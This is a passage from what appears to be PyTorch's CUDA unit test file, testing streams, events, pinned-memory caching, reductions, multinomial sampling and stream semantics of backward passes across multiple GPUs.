self.assertTrue(s0.query())
self.assertFalse(s1.query())
with torch.cuda.device(d0):
self.assertTrue(s0.query())
self.assertFalse(s1.query())
with torch.cuda.device(d1):
self.assertTrue(s0.query())
self.assertFalse(s1.query())
# deliberately using a different device
with torch.cuda.device(d0):
s1.synchronize()
self.assertTrue(s0.query())
self.assertTrue(s1.query())
with torch.cuda.device(d0):
self.assertTrue(s0.query())
self.assertTrue(s1.query())
with torch.cuda.device(d1):
self.assertTrue(s0.query())
self.assertTrue(s1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu_eq(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream()
with torch.cuda.device(d1):
s2 = torch.cuda.current_stream()
s3 = torch.cuda.current_stream()
self.assertTrue(s0 == s0)
self.assertTrue(s0 == s1)
self.assertTrue(s2 == s2)
self.assertTrue(s2 == s3)
self.assertFalse(s0 == s2)
self.assertFalse(s1 == s3)
self.assertEqual(s0.device, s1.device)
self.assertEqual(s0.cuda_stream, s1.cuda_stream)
self.assertEqual(s2.device, s3.device)
self.assertEqual(s2.cuda_stream, s3.cuda_stream)
self.assertNotEqual(s0.device, s3.device)
self.assertEqual(hash(s0), hash(s1))
self.assertEqual(hash(s2), hash(s3))
self.assertNotEqual(hash(s0), hash(s3))
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_streams_priority(self):
low, high = torch.cuda.Stream.priority_range()
s0 = torch.cuda.Stream(device=0, priority=low)
self.assertEqual(low, s0.priority)
self.assertEqual(torch.device('cuda:0'), s0.device)
s1 = torch.cuda.Stream(device=1, priority=high)
self.assertEqual(high, s1.priority)
self.assertEqual(torch.device('cuda:1'), s1.device)
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_tensor_device(self):
self.assertEqual(torch.cuda.FloatTensor(1).get_device(), 0)
self.assertEqual(torch.cuda.FloatTensor(1, device=1).get_device(), 1)
with torch.cuda.device(1):
self.assertEqual(torch.cuda.FloatTensor(1).get_device(), 1)
self.assertEqual(torch.cuda.FloatTensor(1, device=0).get_device(), 0)
self.assertEqual(torch.cuda.FloatTensor(1, device=None).get_device(), 1)
def test_events(self):
stream = torch.cuda.current_stream()
event = torch.cuda.Event(enable_timing=True)
self.assertTrue(event.query())
start_event = torch.cuda.Event(enable_timing=True)
stream.record_event(start_event)
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
stream.record_event(event)
self.assertFalse(event.query())
event.synchronize()
self.assertTrue(event.query())
self.assertGreater(start_event.elapsed_time(event), 0)
@staticmethod
def _stream_synchronize(self, spin_time_cycles):
s = torch.cuda.current_stream()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
e_tik.record(s)
torch.cuda._sleep(spin_time_cycles)
e_tok.record(s)
s.synchronize()
self.assertTrue(s.query())
        # not necessary to check e_tik and e_tok, as elapsed_time would throw
        # an exception otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _event_synchronize(self, spin_time_cycles):
s = torch.cuda.current_stream()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
e_tik.record(s)
torch.cuda._sleep(spin_time_cycles)
s.record_event(e_tok)
e_tok.synchronize()
self.assertTrue(s.query())
        # not necessary to check e_tik and e_tok, as elapsed_time would throw
        # an exception otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _event_wait(self, spin_time_cycles):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.Stream()
e_tik = torch.cuda.Event(blocking=True, enable_timing=True)
e_tok = torch.cuda.Event(blocking=True, enable_timing=True)
e_tik.record(s0)
torch.cuda._sleep(spin_time_cycles - 10)
e_sync = torch.cuda.Event(blocking=True)
e_sync.record()
e_sync.wait(s1)
with torch.cuda.stream(s1):
torch.cuda._sleep(10)
s1.synchronize()
e_tok.record()
e_tok.synchronize()
self.assertTrue(s0.query())
self.assertTrue(s1.query())
self.assertTrue(e_sync.query())
        # not necessary to check e_tik and e_tok, as elapsed_time would throw
        # an exception otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _test_stream_event_nogil(self, sync_func, p2c, c2p):
with torch.cuda.device('cuda:1'):
c2p.put(0)
p2c.get()
c2p.put(sync_func(self, TestCuda.FIFTY_MIL_CYCLES))
# Skip the test for ROCm as per https://github.com/pytorch/pytorch/issues/53190
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_event_nogil(self):
for sync_func in [TestCuda._stream_synchronize,
TestCuda._event_synchronize,
TestCuda._event_wait]:
p2c = queue.Queue()
c2p = queue.Queue()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
t = threading.Thread(
target=TestCuda._test_stream_event_nogil,
args=(self, sync_func, p2c, c2p))
t.daemon = True
t.start()
c2p.get()
with torch.cuda.device('cuda:0'):
e_tik.record()
p2c.put(0)
parent_time = sync_func(self, TestCuda.FIFTY_MIL_CYCLES)
child_time = c2p.get()
e_tok.record()
e_tok.synchronize()
total_time = e_tik.elapsed_time(e_tok)
# Without GIL, synchronizations in parent and child threads can
# overlap. The total execution time should be a little bit longer
# than spinning fifty million cycles and much shorter than twice of
# that. However, testing absolute execution time is not reliable as
# it may vary on different hardware in different environments.
# Therefore, this test uses relative comparisons, checking if the
                # sum of the parent and child threads' execution time is greater
                # than the real execution time by at least 40%.
self.assertGreater(parent_time + child_time, total_time * 1.4)
# This test is flaky for ROCm, see issue #62602
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_events_wait(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
torch.cuda.synchronize(d0)
torch.cuda.synchronize(d1)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
e0 = torch.cuda.Event()
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
self.assertFalse(s0.query())
self.assertTrue(s1.query())
s1.wait_event(e0)
s1.synchronize()
self.assertTrue(e0.query())
self.assertTrue(s0.query())
self.assertTrue(s1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_events_multi_gpu_query(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e0 = s0.record_event()
s0.synchronize()
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
e1 = s1.record_event()
self.assertTrue(e0.query())
self.assertFalse(e1.query())
with torch.cuda.device(d0):
self.assertTrue(e0.query())
self.assertFalse(e1.query())
with torch.cuda.device(d1):
self.assertTrue(e0.query())
self.assertFalse(e1.query())
# deliberately using a different device
with torch.cuda.device(d0):
e1.synchronize()
self.assertTrue(e0.query())
self.assertTrue(e1.query())
with torch.cuda.device(d0):
self.assertTrue(e0.query())
self.assertTrue(e1.query())
with torch.cuda.device(d1):
self.assertTrue(e0.query())
self.assertTrue(e1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
@skipIfRocm
def test_events_multi_gpu_elapsed_time(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e0 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(10)
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
e1 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
s1.record_event(e1)
e0.synchronize()
e1.synchronize()
with torch.cuda.device(d0):
with self.assertRaises(RuntimeError):
self.assertGreater(e0.elapsed_time(e1), 0)
with torch.cuda.device(d1):
with self.assertRaises(RuntimeError):
self.assertGreater(e0.elapsed_time(e1), 0)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e2 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
s0.record_event(e2)
s0.synchronize()
self.assertGreater(e0.elapsed_time(e2), 0)
# deliberately calling from a different device
with torch.cuda.device(d1):
self.assertGreater(e0.elapsed_time(e2), 0)
def test_record_stream(self):
cycles_per_ms = get_cycles_per_ms()
t = torch.FloatTensor([1, 2, 3, 4]).pin_memory()
result = torch.cuda.FloatTensor(t.size())
stream = torch.cuda.Stream()
ptr = [None]
# Performs the CPU->GPU copy in a background stream
def perform_copy():
with torch.cuda.stream(stream):
tmp = t.cuda(non_blocking=True)
ptr[0] = tmp.data_ptr()
torch.cuda.current_stream().wait_stream(stream)
tmp.record_stream(torch.cuda.current_stream())
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
result.copy_(tmp)
perform_copy()
with torch.cuda.stream(stream):
tmp2 = torch.cuda.FloatTensor(t.size())
tmp2.zero_()
            self.assertNotEqual(tmp2.data_ptr(), ptr[0], msg='allocation re-used too soon')
self.assertEqual(result.tolist(), [1, 2, 3, 4])
# Check that the block will be re-used after the main stream finishes
torch.cuda.current_stream().synchronize()
with torch.cuda.stream(stream):
tmp3 = torch.cuda.FloatTensor(t.size())
self.assertEqual(tmp3.data_ptr(), ptr[0], msg='allocation not re-used')
def test_record_stream_on_shifted_view(self):
# See issue #27366
        # This test detects unexpected block reallocation. For a reliable test,
        # the stream used to allocate tensors is isolated. The allocator will not
        # reuse free blocks that were allocated from another stream.
stream_alloc = torch.cuda.Stream()
with torch.cuda.stream(stream_alloc):
base = torch.cuda.FloatTensor([10, 10])
# Record another stream on a shifted view tensor.
view = base[5:]
assert view.storage_offset() > 0
stream_record = torch.cuda.Stream()
with torch.cuda.stream(stream_record):
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
view.record_stream(stream_record)
# Delete those tensors to make the block free soon.
data_ptr = base.data_ptr()
del base, view
# A new tensor should not be allocated to the block above.
stream_alloc.synchronize()
with torch.cuda.stream(stream_alloc):
try_realloc = torch.cuda.FloatTensor([10, 10])
self.assertNotEqual(try_realloc.data_ptr(), data_ptr)
@contextlib.contextmanager
def _get_external_stream(self, device):
cudart = torch.cuda.cudart()
stream = ctypes.c_ulonglong(0)
stream_p = ctypes.POINTER(ctypes.c_void_p)(stream)
stream_p_int = ctypes.cast(stream_p, ctypes.c_void_p).value
with device:
try:
out = cudart.cudaStreamCreate(stream_p_int)
self.assertEqual(out, 0)
self.assertNotEqual(stream.value, 0)
yield stream.value
finally:
out = cudart.cudaStreamDestroy(stream.value)
self.assertEqual(out, 0)
@skipIfRocm
def test_external_streams(self):
device = torch.cuda.device(0)
with self._get_external_stream(device) as stream_v:
ext_stream = torch.cuda.streams.ExternalStream(stream_v)
self.assertEqual(stream_v, ext_stream.cuda_stream)
self.assertEqual(ext_stream.device.index, device.idx)
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_external_streams_multi_device(self):
device = torch.cuda.device(1)
with self._get_external_stream(device) as stream_v:
ext_stream = torch.cuda.streams.ExternalStream(
stream_v, device=device)
self.assertEqual(stream_v, ext_stream.cuda_stream)
self.assertEqual(ext_stream.device.index, device.idx)
def test_noncontiguous_pinned_memory(self):
# See issue #3266
x = torch.arange(0, 10).view((2, 5))
self.assertEqual(x.t(), x.t().pin_memory())
def test_caching_pinned_memory(self):
cycles_per_ms = get_cycles_per_ms()
# check that allocations are re-used after deletion
t = torch.FloatTensor([1]).pin_memory()
ptr = t.data_ptr()
del t
t = torch.FloatTensor([1]).pin_memory()
self.assertEqual(t.data_ptr(), ptr, msg='allocation not reused')
# check that the allocation is not re-used if it's in-use by a copy
gpu_tensor = torch.cuda.FloatTensor([0])
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
gpu_tensor.copy_(t, non_blocking=True)
del t
t = torch.FloatTensor([1]).pin_memory()
self.assertNotEqual(t.data_ptr(), ptr, msg='allocation re-used too soon')
self.assertEqual(list(gpu_tensor), [1])
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_caching_pinned_memory_multi_gpu(self):
# checks that the events preventing pinned memory from being re-used
# too early are recorded on the correct GPU
cycles_per_ms = get_cycles_per_ms()
t = torch.FloatTensor([1]).pin_memory()
ptr = t.data_ptr()
gpu_tensor0 = torch.cuda.FloatTensor([0], device=0)
gpu_tensor1 = torch.cuda.FloatTensor([0], device=1)
with torch.cuda.device(1):
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
gpu_tensor1.copy_(t, non_blocking=True)
del t
t = torch.FloatTensor([2]).pin_memory()
self.assertNotEqual(t.data_ptr(), ptr, msg='allocation re-used too soon')
with torch.cuda.device(0):
gpu_tensor0.copy_(t, non_blocking=True)
self.assertEqual(gpu_tensor1[0], 1)
self.assertEqual(gpu_tensor0[0], 2)
def test_caching_allocator_record_stream_oom(self):
"""allocations delayed by a record_stream call should still be freed on
an out-of-memory in cuda_malloc_retry. see issue #19219"""
stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
y = torch.zeros(40 * 1024 * 1024, device='cuda')
for _ in range(100):
x = torch.empty(40 * 1024 * 1024, device='cuda')
with torch.cuda.stream(stream):
y += x
# delays re-use of `x` until after all operations in `stream`
x.record_stream(stream)
del x
# we've made a mess by allocating up to the device capacity. free any
# cached blocks in case it affects future tests.
torch.cuda.empty_cache()
# Tests for historic illegal memory access, see #17040.
def test_reduction_gpu_memory_accessing(self):
x = torch.ones(512, 8, dtype=torch.float32, device='cuda')
torch.sum(x, 0)
def test_sum_fp16(self):
x = torch.zeros(10, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(), 0)
x = torch.ones(65504, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(), 65504)
self.assertEqual(x.sum(dtype=torch.float32), 65504)
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(dtype=torch.float32), 65536)
a = torch.zeros(1203611).bernoulli_(0.0005)
x = a.to(device='cuda', dtype=torch.float16)
self.assertEqual(x.sum().item(), a.sum().item())
a = torch.zeros(100, 121, 80).bernoulli_(0.0005)
x = a.to(device='cuda', dtype=torch.float16)
self.assertEqual(x.sum((0, 2)).float().cpu(), a.sum((0, 2)))
def test_mean_fp16(self):
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.mean(), 1)
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.mean(dtype=torch.float32), 1)
def test_prod_large(self):
# tests global reduction (should_global_reduce = true) in case of non-zero identity element
x = torch.ones(240000, device='cuda', dtype=torch.float32)
self.assertEqual(x.prod(), 1)
# test for complex types. Note 240k is divisible by 4
for dtype in [torch.cfloat, torch.cdouble]:
x = torch.ones(240000, device='cuda', dtype=dtype) * (0 + 1j)
self.assertEqual(x.prod(), 1)
def test_multinomial_ext(self):
# Test two corner cases from older PyTorch (Issue #4858)
freqs = torch.cuda.FloatTensor([
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.03178183361887932, 0.027680952101945877, 0.033176131546497345,
0.046052902936935425, 0.07742464542388916, 0.11543981730937958,
0.14148041605949402, 0.15784293413162231, 0.13180233538150787,
0.08271478116512299, 0.049702685326337814, 0.027557924389839172,
0.018125897273421288, 0.011851548217236996, 0.010252203792333603,
0.007422595750540495, 0.005372154992073774, 0.0045109698548913,
0.0036087757907807827, 0.0035267581697553396, 0.0018864056328311563,
0.0024605290964245796, 0.0022964938543736935, 0.0018453967059031129,
0.0010662291897460818, 0.0009842115687206388, 0.00045109697384759784,
0.0007791675161570311, 0.00020504408166743815, 0.00020504408166743815,
0.00020504408166743815, 0.00012302644609007984, 0.0,
0.00012302644609007984, 4.100881778867915e-05, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0])
torch.cuda.manual_seed(11042)
sample = torch.multinomial(freqs, 1000, True)
self.assertNotEqual(freqs[sample].min(), 0)
p = torch.zeros(3421, 2, device="cuda", dtype=torch.float)
p[:, 1] = 1
torch.cuda.manual_seed(5214)
r = torch.multinomial(p, 1)
self.assertNotEqual(r.min().item(), 0)
# test corner case from Issue #13867
torch.cuda.manual_seed(33)
probs = torch.randn(1000000, device='cuda').clamp(min=0) * 3e-5
samples = probs.multinomial(1000000, replacement=True)
self.assertGreater(probs[samples].min().item(), 0)
def _spawn_test_multinomial_invalid_probs_cuda(self, probs):
import subprocess
try:
p = subprocess.Popen([sys.executable, '-c', f"""\
import sys
import torch
from torch._six import inf, nan
try:
with torch.random.fork_rng(devices=[0]):
torch.multinomial(torch.tensor({probs}).to('cuda'), 2, replacement=True)
torch.cuda.synchronize()
sys.exit(-1) # Should not be reached
except RuntimeError as e:
sys.exit(-2)
"""], stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
out, err = p.communicate(timeout=10)
p.wait(timeout=10)
except subprocess.TimeoutExpired as e:
p.kill()
out, err = p.communicate()
expected_messages = [
'device-side assert triggered', # CUDA
'Assertion', # CUDA
'HSA_STATUS_ERROR_EXCEPTION', # ROCm
'Device-side assertion' # ROCm
]
self.assertTrue(any([msg in out or msg in err for msg in expected_messages]))
@slowTest
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
def test_multinomial_invalid_probs_cuda(self):
self._spawn_test_multinomial_invalid_probs_cuda([1., -1., 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., inf, 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., -inf, 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., 1., nan])
@slowTest
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_huge_index(self):
src = torch.empty(15000000, 45, device='cuda', dtype=torch.long).random_(0, 2**22)
idx = torch.randperm(src.shape[0], device='cuda')
res = src[idx]
res_cpu = src.cpu()[idx.cpu()]
self.assertEqual(res.cpu(), res_cpu)
def test_tensor_gather(self):
AbstractTestCases._TestTorchMixin._test_gather(self, lambda t: t.cuda(), False)
def test_tensor_scatter(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(), 'scatter_', test_bounds=False)
def test_tensor_scatterAdd(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(), 'scatter_add_', test_bounds=False)
def test_scatter_add_mult_index_base(self):
AbstractTestCases._TestTorchMixin._test_scatter_add_mult_index_base(self, lambda t: t.cuda())
def test_tensor_scatterFill(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', True, test_bounds=False)
def test_tensor_scatter_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', test_bounds=False, test_complex=True)
def test_tensor_scatterAdd_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_add_', test_bounds=False, test_complex=True)
def test_tensor_scatterFill_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', True, test_bounds=False, test_complex=True)
def test_min_max_inits(self):
# Testing if THC_reduceAll received the correct index initialization.
# This affects the result of THC_reduceAll operations at extreme values
x = torch.cuda.ByteTensor([0])
y = torch.cuda.ByteTensor([255])
expected = torch.cuda.LongTensor([0])[0]
_, v = x.max(dim=0)
self.assertEqual(v, expected)
_, v = y.min(dim=0)
self.assertEqual(v, expected)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_get_set_rng_state_all(self):
states = torch.cuda.get_rng_state_all()
before0 = torch.cuda.FloatTensor(100, device=0).normal_()
before1 = torch.cuda.FloatTensor(100, device=1).normal_()
torch.cuda.set_rng_state_all(states)
after0 = torch.cuda.FloatTensor(100, device=0).normal_()
after1 = torch.cuda.FloatTensor(100, device=1).normal_()
self.assertEqual(before0, after0, atol=0, rtol=0)
self.assertEqual(before1, after1, atol=0, rtol=0)
def test_nvtx(self):
# Just making sure we can see the symbols
torch.cuda.nvtx.range_push("foo")
torch.cuda.nvtx.mark("bar")
torch.cuda.nvtx.range_pop()
def test_bincount_ext(self):
# ensure CUDA code coverage
input_size = (5000,)
w = torch.randn(input_size, dtype=torch.double, device='cuda')
w_cpu = w.cpu()
# test shared memory impl
t = torch.randint(50, input_size, dtype=torch.int8, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
# test multi block memory impl
# see `THRESH_NUMBER_BINS_FOR_MULTI_BLOCK_MEM` in SummaryOps.cu
t = torch.randint(500, input_size, dtype=torch.int64, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
# test global memory impl
# see `THRESH_NUMBER_BINS_FOR_GLOBAL_MEM` in SummaryOps.cu
t = torch.randint(2000, input_size, dtype=torch.int64, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
t = torch.zeros([10], dtype=torch.int32, device='cuda')
        # 35488 * 65536 as int32 would overflow to a negative value,
        # giving a negative bin offset
t[0] = 35488
counted = t.bincount(minlength=65536)
self.assertEqual(torch.sum(counted), 10)
def test_tiny_half_norm_(self):
a = torch.arange(25).cuda().float()
a /= 100000000
b = a.half()
self.assertGreater(b.norm().item(), 0)
def test_norm_type_conversion(self):
a = torch.ones(65536).cuda().half()
self.assertEqual(a.norm(p=0, dtype=torch.float32), 65536)
# Test that wrap_with_cuda_memory_check successfully detects leak
# skip for ROCM. Look into #62533.
@skipIfRocm
def test_cuda_memory_leak_detection(self):
l = []
@self.wrap_with_cuda_memory_check
def no_leak():
pass
@self.wrap_with_cuda_memory_check
def leak_gpu0():
l.append(torch.tensor(10, device=torch.device("cuda:0")))
no_leak()
with self.assertRaisesRegex(AssertionError, r"leaked \d+ bytes CUDA memory on device 0"):
leak_gpu0()
if TEST_MULTIGPU:
@self.wrap_with_cuda_memory_check
def leak_gpu1():
l.append(torch.tensor(10, device=torch.device("cuda:1")))
with self.assertRaisesRegex(AssertionError, r"leaked \d+ bytes CUDA memory on device 1"):
leak_gpu1()
def test_cuda_memory_leak_detection_propagates_errors(self):
with self.assertRaisesRegex(RuntimeError, r"The size of tensor a \(3\) must match"):
with self.assertLeaksNoCudaTensors():
x = torch.randn(3, 1, device='cuda')
y = torch.randn(2, 1, device='cuda')
z = x + y
def test_trilu_indices(self):
for test_args in tri_tests_args:
_compare_trilu_indices(self, *test_args, device='cuda')
# test default options
x = torch.ones(
3, 3, dtype=torch.long, device='cuda', layout=torch.strided)
self.assertEqual(
x.tril(0).nonzero().transpose(0, 1),
torch.tril_indices(3, 3, device='cuda'))
self.assertEqual(
x.triu(0).nonzero().transpose(0, 1),
torch.triu_indices(3, 3, device='cuda'))
def test_large_trilu_indices(self):
for test_args in tri_large_tests_args:
_compare_large_trilu_indices(self, *test_args, device='cuda')
@unittest.skipIf(not TEST_MEDIUM_TENSOR, "not enough memory")
def test_cuda_kernel_loop_overflow(self):
# Issue #24309: In extreme cases, the loop variable could overflow and continue
# the kernel loop with a negative index, causing a RuntimeError (invalid write):
x = torch.randn(1, 1, 1, 2**30 + 1, dtype=torch.float16, device="cuda")
expected = x[0, 0, 0, 2**30]
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
torch.cuda.synchronize()
self.assertEqual(y[0, 0, 0, 2**30], expected)
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_cuda_kernel_loop_overflow_large(self):
# Make sure input.numel() > INT_MAX is handled:
x = torch.randn(1, 1, 1, 2**31, dtype=torch.float16, device="cuda")
with self.assertRaisesRegex(RuntimeError, "integer out of range"):
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
# Issue #24309: In extreme cases, the loop variable could overflow and continue
# the kernel loop with a negative index, causing a RuntimeError (invalid write):
x = torch.randn(1, 1, 1, 2**31 - 1, dtype=torch.float16, device="cuda")
expected = x[0, 0, 0, 2**31 - 2]
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
torch.cuda.synchronize()
self.assertEqual(y[0, 0, 0, 2**31 - 2], expected)
# this might create a reference cycle on self...
def _make_multiply_in_stream(self):
class MultiplyInStream(torch.autograd.Function):
@staticmethod
def forward(ctx, x, val):
ctx.val = val
ctx.stream = torch.cuda.current_stream()
return x * val
@staticmethod
def backward(ctx, grad):
self.assertEqual(torch.cuda.current_stream(), ctx.stream)
                # delays the operation in the background stream
torch.cuda._sleep(1000 * 5000)
return grad * ctx.val, None
return MultiplyInStream
@skipCUDANonDefaultStreamIf(True)
def test_streaming_backwards_sync(self):
default_stream = torch.cuda.current_stream()
stream = torch.cuda.Stream()
MultiplyInStream = self._make_multiply_in_stream()
# Tests using grads outside the backward() stream context
# See "Stream semantics of backward passes" on https://pytorch.org/docs/stable/notes/cuda.html
x = torch.randn(5, 5, device='cuda', requires_grad=True)
with torch.cuda.stream(stream):
stream.wait_stream(default_stream)
output = MultiplyInStream.apply(x, 2)
output.sum().backward()
# sync needed
default_stream.wait_stream(stream)
self.assertEqual(x.grad, torch.ones_like(x) * 2)
self.assertEqual(torch.cuda.current_stream(), default_stream)
# Tests that using grads in the same stream context as backward()
# is safe regardless what streams bwd ops ran on
bwd_ambient_stream = torch.cuda.Stream()
x = torch.randn(5, 5, device='cuda', requires_grad=True)
with torch.cuda.stream(stream):
stream.wait_stream(default_stream)
output = MultiplyInStream.apply(x, 3)
with torch.cuda.stream(bwd_ambient_stream):
bwd_ambient_stream.wait_stream(stream)
output.sum().backward()
# x was first used on "stream" so its AccumulateGrad leaf should run on "stream".
# The end of backward() should have synced "bwd_ambient_stream" with "stream"
# so it should be safe to use x.grad here without any syncs.
self.assertEqual(x.grad, torch.ones_like(x) * 3)
self.assertEqual(torch.cuda.current_stream(), bwd_ambient_stream)
# Skip the test for ROCm as per https://github.com/pytorch/pytorch/issues/53190
@skipIfRocm
def test_streaming_backwards_multiple_streams(self):
MultiplyInStream = self._make_multiply_in_stream()
class StreamModel(torch.nn.Module):
def __init__(self):
super(StreamModel, self).__init__()
self.event = torch.cuda.Event()
self.stream0 = torch.cuda.Stream()
self.stream1 = torch.cuda.Stream()
def forward(self, x, x_first_use_on_ambient):
if x_first_use_on_ambient:
x0 = x.clone()
self.stream0.wait_stream(torch.cuda.current_stream())
self.stream1.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(self.stream0):
if not x_first_use_on_ambient:
x0 = x.clone()
y0 = MultiplyInStream.apply(x0, 2)
self.event.record(stream=torch.cuda.current_stream())
with torch.cuda.stream(self.stream1):
y1 = MultiplyInStream.apply(x, 3)
self.stream1.wait_event(self.event)
return y0 + y1
stream = torch.cuda.Stream()
for x_first_use_on_ambient in (True, False):
# the out_of_place=False, iters=1 case stresses whether proper syncs are inserted
# when grads are initially None and stolen by backward ops.
for out_of_place, iters in ((True, 1),
(False, 1),
(False, 5)):
with torch.cuda.stream(stream):
x = torch.randn(5, 5, device='cuda', requires_grad=True)
model = StreamModel().cuda()
x.register_hook(lambda grad: self.assertEqual(torch.cuda.current_stream(),
stream if x_first_use_on_ambient else model.stream0))
for p in model.parameters():
self.assertTrue(p.grad is None)
for i in range(iters):
loss = model(x, x_first_use_on_ambient).sum()
if out_of_place:
x_grad = torch.autograd.grad((loss,), (x,))[0]
else:
loss.backward()
# See "Stream semantics of backward passes" on https://pytorch.org/docs/stable/notes/cuda.html
torch.cuda.current_stream().wait_stream(stream)
if out_of_place:
self.assertEqual(x_grad, torch.ones_like(x) * 5 * iters)
else:
self.assertEqual(x.grad, torch.ones_like(x) * 5 * iters)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_streaming_backwards_device_transfer(self):
# This function must run with non-default current streams on all devices, otherwise it's meaningless.
# The intention is to test that to()'s backward (CopyBackward) interacts properly with the
# synchronization logic in torch/csrc/autograd/input_buffer.cpp.
dev0 = torch.device("cuda:0")
dev1 = torch.device("cuda:1")
# Unfortunately I need to make the tensors largeish.
# Bigger tensors = longer D2D transfers = more likely to expose races.
size = 2**26
a = torch.full((size,), 1, device=dev1, dtype=torch.float64, requires_grad=True)
b = torch.full((size,), 1, device=dev1, dtype=torch.float64, requires_grad=True)
# Here to_backward_recipient = a*b is used only once, so MulBackward's InputBuffer slot only expects 1 input.
# This tests the situation where we don't call InputBuffer::accumulate for MulBackward's InputBuffer.
to_backward_recipient = a * b
s = to_backward_recipient.to(device="cuda:0").sum()
torch.cuda.synchronize(device=dev0)
torch.cuda.synchronize(device=dev1)
s.backward()
self.assertTrue(a.grad.sum().item() == size)
self.assertTrue(b.grad.sum().item() == size)
# Here to_backward_recipient = a*b is used twice, so MulBackward's InputBuffer slot expects 2 inputs.
# This tests the situation where we do call InputBuffer::accumulate for MulBackward's InputBuffer.
a.grad = None
b.grad = None
to_backward_recipient = a * b
# Multiply by 2 here so to's backward creates gradient values that are different from the case above,
# to mitigate weirdness if the caching allocator happens to reuse memory regions that were populated
# with 1s by the case above
s0 = to_backward_recipient.to(device="cuda:0").sum() * 2.
s1 = to_backward_recipient.to(device="cuda:0").sum() * 2.
torch.cuda.synchronize(device=dev0)
torch.cuda.synchronize(device=dev1)
s0.backward(retain_graph=True)
s1.backward()
self.assertTrue(a.grad.sum().item() == 4 * size)
self.assertTrue(b.grad.sum().item() == 4 * size)
def test_streaming_backwards_sync_graph_root(self):
# This function tests if bwd ops running on a side stream properly sync with the GraphRoot.
# The potential bug it targets is a race condition. The test uses multiple trials and
